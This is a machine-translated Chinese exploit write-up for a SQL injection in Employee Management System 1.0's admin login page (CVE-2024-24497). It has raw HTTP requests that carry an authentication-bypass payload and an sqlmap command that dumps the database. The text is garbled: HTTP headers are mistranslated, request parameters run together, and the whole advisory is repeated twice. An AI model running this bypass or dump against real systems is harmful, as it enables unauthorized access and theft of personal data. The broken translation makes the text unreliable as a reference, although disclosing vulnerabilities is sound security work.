#利用title:员工管理系统1.0-
#DATE: 2024年2月2日
#利用作者: yevhenii butenko
#供应商homepage: https://www.sourcecodester.com
#软件link: https://www.sourcecodester.com/php/16999/employee-management-system.html
#版本: 1.0
#测试在: Debian
#CVE : CVE-2024-24497
### SQL注入:
SQL注入是一种安全漏洞,允许攻击者干扰应用程序对其数据库的查询。通常,它涉及通过客户从客户端到应用程序的输入数据插入或“注入” SQL查询。成功的SQL注入漏洞可以从数据库中读取敏感数据,修改数据库数据(插入/update/delete),在数据库上执行管理操作(例如关闭DBMS),恢复DBMS文件系统上存在的给定文件的内容,在某些情况下,对操作系统发出命令。
###受影响的组件:
/employee_akpoly/admin/login.php
admin登录机构中的两个参数


### Description:
应用程序中SQL注入的存在使攻击者可以通过专门精心设计的请求向数据库发出直接查询。
##概念证明:
###手动开发
有效载荷
````````
post/employee_akpoly/admin/login.php http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 61
Origin: http://localhost
连接:关闭
Referer: http://localhost/雇员/admin/login.php
cookie: phpsessid=lcb84k6drd2tepn90ehe7p9n20
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
txtusername=admin' and 1=1----txtpassword=passwordbtnlogin=
````````
### sqlmap
将以下请求保存到
````````
post/employee_akpoly/admin/login.php http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 62
Origin: http://localhost
连接:关闭
Referer: http://localhost/雇员/admin/login.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
txtuusername=admintxtpassword=passwordbtnlogin=
````````
与
````````
sqlmap -r admin_login.txt - level 5-风险3-批次-dbms mysql -dump
````````
##建议
使用此员工管理系统时,必须更新应用程序代码,以确保用户输入消毒和对特殊字符的适当限制。
txtusername
和txtpassword
sql注入(admin登录)#DATE: 2024年2月2日
#利用作者: yevhenii butenko
#供应商homepage: https://www.sourcecodester.com
#软件link: https://www.sourcecodester.com/php/16999/employee-management-system.html
#版本: 1.0
#测试在: Debian
#CVE : CVE-2024-24497
### SQL注入:
SQL注入是一种安全漏洞,允许攻击者干扰应用程序对其数据库的查询。通常,它涉及通过客户从客户端到应用程序的输入数据插入或“注入” SQL查询。成功的SQL注入漏洞可以从数据库中读取敏感数据,修改数据库数据(插入/update/delete),在数据库上执行管理操作(例如关闭DBMS),恢复DBMS文件系统上存在的给定文件的内容,在某些情况下,对操作系统发出命令。
###受影响的组件:
/employee_akpoly/admin/login.php
admin登录机构中的两个参数
txtusername
和`txtpassword“很容易受到SQL注入的影响。

### Description:
应用程序中SQL注入的存在使攻击者可以通过专门精心设计的请求向数据库发出直接查询。
##概念证明:
###手动开发
有效载荷
''和1=1 ----
可用于绕过管理登录页面中的身份验证。````````
post/employee_akpoly/admin/login.php http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 61
Origin: http://localhost
连接:关闭
Referer: http://localhost/雇员/admin/login.php
cookie: phpsessid=lcb84k6drd2tepn90ehe7p9n20
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
txtusername=admin' and 1=1----txtpassword=passwordbtnlogin=
````````
### sqlmap
将以下请求保存到
admin_login.txt
:````````
post/employee_akpoly/admin/login.php http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 62
Origin: http://localhost
连接:关闭
Referer: http://localhost/雇员/admin/login.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
txtuusername=admintxtpassword=passwordbtnlogin=
````````
与
-r
选项一起使用sqlmap
````````
sqlmap -r admin_login.txt - level 5-风险3-批次-dbms mysql -dump
````````
##建议
使用此员工管理系统时,必须更新应用程序代码,以确保用户输入消毒和对特殊字符的适当限制。